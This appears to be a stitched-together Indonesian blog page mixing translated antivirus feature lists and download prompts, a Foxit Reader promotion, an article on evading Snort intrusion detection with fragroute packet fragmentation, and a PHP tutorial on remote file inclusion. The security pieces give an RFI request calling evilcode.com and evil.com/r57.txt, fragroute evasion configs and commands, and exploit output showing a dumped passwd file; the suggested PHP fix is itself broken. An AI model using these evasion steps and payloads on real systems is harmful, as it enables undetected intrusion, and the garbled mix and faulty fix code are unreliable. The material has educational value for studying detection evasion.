· ThreatSense teknologi - sebuah dioptimalkan tunggal Ancaman Anti-mesin untuk menganalisis kode untuk mengidentifikasi perilaku berbahaya, seperti virus, spyware, adware, phishing dan lebih
· Analisis heuristik Tertandingi mampu menemukan ancaman malware baru yang muncul
· Powerfull teknologi PC emulasi virtual memungkinkan membongkar dan dekripsi dari semua jenis kemasan arsip dan
run-time
· Mampu membersihkan malware yang aktif berjalan di memori
· Melindungi pada titik-titik infiltrasi beberapa, termasuk HTTP, POP3, SMTP dan semua media lokal dan removable
· Menghapus infeksi dari file yang terkunci untuk menulis (misalnya, file DLL dimuat)
· Mencegah file yang terinfeksi dari dibuka dan dijalankan, dan memperingatkan pada penciptaan file yang terinfeksi
Automatic eksekusi pada startup sistem
· Mendukung beberapa lingkungan Terminal Server
· Mendukung pemindaian jaringan disk dipetakan
Apa yang Baru di NOD32 5.0.94.0:
· Perbaiki: masalah dengan instalasi pada selain lokasi default
· Perbaiki: masalah dengan re-aktivasi produk dalam kasus tidak ada koneksi internet
· Perbaiki: validasi data dalam dialog aktivasi
· Perbaiki: memeriksa tentang update baru PCU - bagian UI
· Fix: kecelakaan saat menampilkan gelembung GUI desktop yang
· Perbaiki: dihapus (disarankan) dari jendela aktivasi
· Perbaiki: Setup Parental Control dihapus dari Setup / Komputer Halaman
· Perbaiki: validasi data
· Perbaiki: link ke halaman pengaturan removable media
· Ditambahkan: dukungan untuk sumber daya distributor
· Ubah: Aplikasi ikon berubah
· Ubah: Sysrescue grafis diperbarui
· Ubah: tanggal hak cipta dikoreksi
Kalau udah bacanya dan tertarik download NOD32 pada link di bawah :
Cara download klik link di atas tunggu beberapa detik klik " SKIP AD"
Perlindungan terhadap virus, malware, adware, spyware, phishing.
Aplikasi Avira AntiVir Premium ini dirancang untuk menjadi alat yang komprehensif dan fleksibel, Anda dapat mengandalkan aplikasi ini untuk melindungi komputer Anda dari virus, malware, program yang tidak diinginkan, dan bahaya lainnya.
Berikut ini adalah beberapa fitur dari "Avira Antivirus Premium 2012":
AntiVir stops all types of viruses
AntiAd/Spyware eliminates ad/spyware
AntiPhishing proactive protection against phising
AntiRootkit against hidden rootkit threats
AntiDrive-by prevents against downloading viruses when surfing
EmailScanner enhanced email protection
WebGuard protection against malicious websites
RescueSystem create a bootable rescue CD
QuickRemoval eliminate viruses at the push of a button
NetbookSupport for laptops with low resolution
Requirements:
· At least 100 MB of free hard disk memory space (more if using Quarantine for temporary storage)
· At least 192 MB RAM under Windows 2000/XP
· At least 512 MB RAM under Windows Vista
· For all installations: Windows Internet Explorer 6.0 or higher
· Administrator rights are required for the installation
download here
Terbitan Online Kecoak Elektronik
======================================
IP FRAGMENTATION FOR EVADING NIDS
======================================
Introduction
------------
IDS pada umumnya bekerja dilayer 2 OSI, ids menggunakan "raw traffic"
dari proses sniffing kemudian mencocokkannya dengan signature yang
dibuat oleh seorang admin. Jika ada kecocokan antara signature dengan raw tra
ffic hasil sniffing paket, ids memberikan alert/peringatan sebagai tanda
adanya proses intrusi ke sistem.
Seorang attacker dapat memfragmentasi paket IP/TCP menjadi bagian kecil
kemudian mengacak paket tersebut secara random untuk dikirim ke server
target, sedangkan server yang menjadi destination harus bertanggung jawab
dalam proses reassembly paket. Tentu saja dengan cara seperti ini attack
er dapat melewati monitoring ids karena tidak ada kecocokan pola packet
dengan signature ids.
Requirements
-------------
Pada tulisan ini penulis menggunakan dua buah mesin unix, mesin A adalah
mesin attacker beralamat 172.16.11.234 dilengkapi dengan "fragroute" dan
mesin T adalah mesin target yang beralamat 172.16.11.103 dilengkapi dengan
NIDS "snort" versi 2.6.0
IP Fragmentation Attack
------------------------
Penulis menggunakan sebuah contoh melewati ids yang memfilter attacking
terhadap hole mambo index.php remote file inclussion untuk menjelaskan
IP fragmentation attack. Berikut request HTTP untuk mengexploitasi hole
pada mambo website :
GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://evilcode.com/inject.txt?
(Advisory hole mambo di http://secunia.com/advisories/18935/)
Sebuah rule snort dibuat untuk mendeteksi adanya attacking menggunakan
hole mambo diatas. Berikut ini file rule.conf yang digunakan :
var HTTP_SERVER 172.16.11.103
alert tcp any any -> $HTTP_SERVER 80 (content: "index.php?_REQUEST=\
[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=\
http\://"; msg: "Attacking Website Using Remote File Inclussion in Mamboo";)
Jalankan snort dengan mode IDS untuk mendeteksi adanya malicious request
#snort -d -c rule.conf &
Saat seorang attacker merequest webserver dengan malicious request untuk meng
ekploitasi mambo, snort akan segera memberikan peringatan berikut:
Snort memberikan warning karena adanya kesamaan pola request HTTP dengan
rule yang digunakan oleh snort. Lalu bagaimana cara menghindari monitoring
snort?. Untuk menghindarinya seorang attacker dapat mengacak pola request
yang dikirim ke server. Salah satu cara yang bisa digunakan adalah dengan
memfragmentasi paket IP dan/atau TCP kemudian mengirimkannya secara acak
kepada target. Snort tidak mendeteksi adanya attacking karena tidak ada
kesamaan pola request dengan rule. Sistem target harus bertanggung jawab
dalam proses reassembly paket dan menjawab request attacker, sehingga attacker
dapat mengexploitasi target tanpa terdeteksi oleh snort. Penulis mengguna
kan fragroute untuk mengirimkan request HTTP terfragmentasi ke target dengan
rule frag.conf berikut :
ip_frag 8
order random
print
Rule diatas digunakan untuk memecah/memfragmentasi data dalam paket IP men
jadi 8 bytes dan mengirimkan fragmen - fragmen paket IP tersebut secara
acak kepada target. Untuk lebih jelasnya bagaimana membuat rule fragroute
silakan dibaca manualnya. (rule "print" tidak berhubungan dalam proses pe
ngiriman paket IP hanya untuk mencetak proses fragroute ke stdout). Jalan
kan fragroute di mesin attacker dengan target mesin 172.16.11.103.
#./fragroute -f frag.conf 172.16.11.103
Dengan menggunakan rule fragroute diatas paket data yang dikirim dalam frag
men - fragmen paket sebagai berikut : (Analisis paket menggunakan ethereal)
Original request
GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://evilcode.com/inject.txt?
Karena aturan di rule fragroute memfragmentasi paket menjadi 8 bytes request
menjadi :
Kemudian karena rule fragroute "order random", paket IP yang terfragmentasi
tadi dikirim secara acak sehingga berbeda sekali dengan request aslinya.Se
telah dirandom, berdasar analisis ethereal paket IP yang dikirim menjadi seba
gai berikut :
Okee... deghh kalo contoh diatas mungkin masih cukup mengambang, apalagi
Jika web attacking dilakukan lewat browser, dimungkinkan attacking ga
akan jalan jika paket IP di fragmentasi. Untuk menyederhanakan pemahaman
Web attacking dengan IP fragmentasi untuk melewati ids, berikut sebuah
PoC sederhana local file inclussion menggunakan socket perl :
TARGET
-------
TARGET WEB BER IP 172.16.11.234
Vulnerable File http://172.16.11.234/test/cmd.php
B. Attacking Menggunakan Fragmentasi Request
Pada teknik berikut yang difragmentasi adalah paket TCP,
ATTACKER DI WINDOW 1
---------------------
[root@komputer19 fragroute-1.2]#cat f.conf
tcp_seg 8
order random
print
[root@komputer19 fragroute-1.2]# ./fragroute -f f.conf 172.16.11.234
fragroute: tcp_seg -> order -> print
Buka console baru
ATTACKER DI WINDOW 2
---------------------
[novice@komputer19 google]$ perl xplo.pl 172.16.11.234
PoC Evading NIDS via socket
root:*:0:0:Charlie &:/root:/bin/bash
daemon:*:1:1:The devil himself:/root:/sbin/nologin
operator:*:2:5:System &:/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin
smmsp:*:25:25:Sendmail Message Submission Program:/nonexistent:/sbin/nologin
popa3d:*:26:26:POP3 Server:/var/empty:/sbin/nologin
sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin
uucp:*:66:1:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
www:*:67:67:HTTP Server:/var/www:/sbin/nologin
named:*:70:70:BIND Name Service Daemon:/var/named:/sbin/nologin
proxy:*:71:71:Proxy Services:/nonexistent:/sbin/nologin
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
(edited n cencored by author)
[novice@attacker]$
TARGET
-------
# tail -f /var/log/snort/alert
(kosong tidak ada alert)
Nah..., dengan teknik mengacak paket, ids bisa dihindari dan masih ada
beberapa teknik lain lagi yang bisa digunakan untuk menghindari ids namun
itu tugas anda untuk mencari referensi jika anda memang serius belajar
kemanan sistem komputer.
Siapa yang tidak kenal dengan Adobe Reader? Semua orang yang setiap harinya bekerja dengan komputer pasti pernah mengenalnya. Adobe reader adalah software terkenal buatan raksasa software Adobe yang biasa digunakan untuk membaca file PDF (portable document format).
Jika anda sudah bosan dengan adobe reader, atau ingin mencoba sesuatu yang baru, anda bisa memanfaatkan Foxit Reader untuk membaca file PDF. Software ini tidak kalah menarik jika dibandingkan dengan adobe reder karena memiliki banyak fitur menarik. Bahkan (menurut pengalaman kami), foxit reader lebih baik ketimbang adobe reader.
Beberapa fitur menarik yang bisa anda dapat dari foxit reader yaitu :
File installer lebih kecil.
Bagi yang punya koneksi internet lambat, ini menjadi solusi menarik karena anda tidak perlu meluangkan waktu yang banyak untuk mendownload foxit reader.
Bisa membuka banyak file dengan TAB.
Jika anda menggunakan foxit reader untuk membaca beberapa file PDF sekaligus, anda bisa melihat di situ ada banyak tab yang terbuka. Seperti yang biasa anda lihat pada web browsermozilla firefox.
Berjalan lebih cepat.
Karena file installernya kecil, maka hasil file installernya juga kecil. Tidak dibutuhkan waktu yang lama untuk membuka file PDF menggunakan foxit reader.
Lebih aman
Foxit menyertakan fitur security pada pada plugin dari software. Dengan ini, program akan menkonfirmasi anda terlebih dahulu jika akan membuka sebuah link di internet. Solusi yang cerdas sebelum anda terjebak untuk membuka alat website yang terjangkit dengan malware atau spyware.
Jika ingin mencoba menggunakan foxit reader, download dan install di komputer windows anda sekarang juga. Semua bisa di dapat dengan gratis dari oficial website-nya. Jika anda rasa foxit reader tidak lebih baik dari PDF reader yang lain, anda tinggal meng-uninstall-nya dari komputer anda. Cukup mudah bukan? Link download
== Pengenalan Celah keamanan pada Aplikasi Web berbasis PHP ==
Pendahuluan PHP adalah salahsatu bahasa pemrograman web yang pengguna dan penikmatnya cukup banyak
di area cyberspace. dikarenakan bahasa web ini yang dinamis dan termasuk dalam opensource (info :
http://php.net). PHP menjadi “ladang� pengaplikasian berbagai variabel yang ada dalam script secara
autoglobal oleh programer dan juga menjadi “ladang� attacking para attacker karena PHP memiliki
fasilitas autoglobal pada beberapa variabel :p
GET and POST Diawali dengan deklarasi variabel GET/POST yang berasal dari fasilitas autoglobal yang
ada dalam PHP. variabel register_global yang tersetting “on� pada file php.ini berfungsi untuk
membatasi variabel-variabel apa saja yang akan digunakan dalam script php. jika register_global on
maka web admin tidak perlu spesifik dalam mendefinisikan variabel dan jika off. maka variabelpun
harus di definisikan secara spesifik. seperti ini lah contoh script php nya :
-----------------------------------------------------------------------
<?php
echo $_POST['newhack']; //variabel newhack dikirim dengan methode POST
?>
-----------------------------------------------------------------------
dari sisi pengamanan settingan on lebih rawan daripada off. dikarenakan variabel-variabel yang
dibatasi sangat minim. apabila kita settingan off maka effisiensi code sangat lah besar. jadi,
pentingnya register_global sangat di utamakan dalam sebuah aplikasi web yang bertujuan dalam hal
pengamanan.
Parameter Include Berhubungan dengan sub-bab diatas, fasilitas autoglobal pada PHP juga pasti
berpengaruh pada parameter fungsi include(), require(), fopen() dan lain-lain. contoh variabel
seperti itu dengan mudah dapat diisi dengan variabel GET/POST atau COOKIES/SESSION. karena pengaruh
autoglobal itu sendiri.
saya akan memberikan contoh salah-satu bug yang berhubungan dengan variabel-variabel diatas. Remote
File Inclusion, bug klasik (mungkin sekarang masih ada :p) yang digunakan untuk me-remote
web/server si target. contoh script PHP :
-----------------------------------------------------------------------
<?php
$file =$_GET['page']; // contoh kita akan menginclude file galeri.php
include($file);
?>
-----------------------------------------------------------------------
tanpa sanitasi input dalam proses pengeksekusian $file =$_GET['page'];
http://www.site.com/index.php?page=galeri.php
maka attacker akan dengan mudah menginjek proses $file dengan evil scriptnya. contoh menjadi seperti ini
http://www.site.com/index.php?page=http://www.evil.com/r57.txt?
dan bila kita lihat source codenya akan menjadi seperti ini :
-----------------------------------------------------------------------
<?php
$file =�http://www.evil.com/r57.txt?�; / /$_GET['page'];
include($file);
?>
-----------------------------------------------------------------------
script $file akan menjadi script yang di injekan oleh si attacker. prosesnya seperti ini. pertama,
awal dari bug ini adalah lagi-lagi fungsi dari include. fungsi ini berguna untuk menginclude
(memasukan) file, yang disini telah dirubah menjadi file remote oleh si attacker. variabel fungsi
yang sama terdapat pada include_once(), require(), require_once(). solusi dari bug ini sebenarnya
sangat banyak. tapi bagi saya ada beberapa yang efisien digunakan. salah satunya dengan memasukan
file yang sah di include ke array. contoh script seperti ini :
-----------------------------------------------------------------------
$file_valid = new array(“index�,�galeri�,�profil�);
$file = $_GET['page'];
if(!in_array($file_valid,$file)){$file = index;} // fungsi cek file
-----------------------------------------------------------------------
proses sederahananya seperti ini : $file_valid adalah variabel baru yang dimasukan ke array. lalu
code selanjutnya adalah pengecekan ketika $file di injeksi oleh script attacker
(www.evil.com/r57.txt) maka file tidak valid karena tidak ada dalam array $file_valid. lalu %file
di ganti value (redirect) ke file index.php
Penutup Sebenarnya masih banyak lagi celah-celah keamanan pada aplikasi web berbasis PHP. dari
mulai proses input query database, system(), passthry(), shellexec(), exec() dan lain-lain. atau
pada database seperti MySQL, bug dijalankan melalui perintah-perintah yang bisa kita inputkan di
web browser. tapi dalam artikel ini saya hanya mengenalkan beberapa celah keamanan yang cukup
diperhitungkan kondisinya.
Refrensi
http://www.php.net
http://www.google.com (dork : security php)
http://www.go4expert.com/forum
KEAMANAN PADA APLIKASI WEB DENGAN PHP oleh ABD. THALIB
Dan lain-lain (lupa)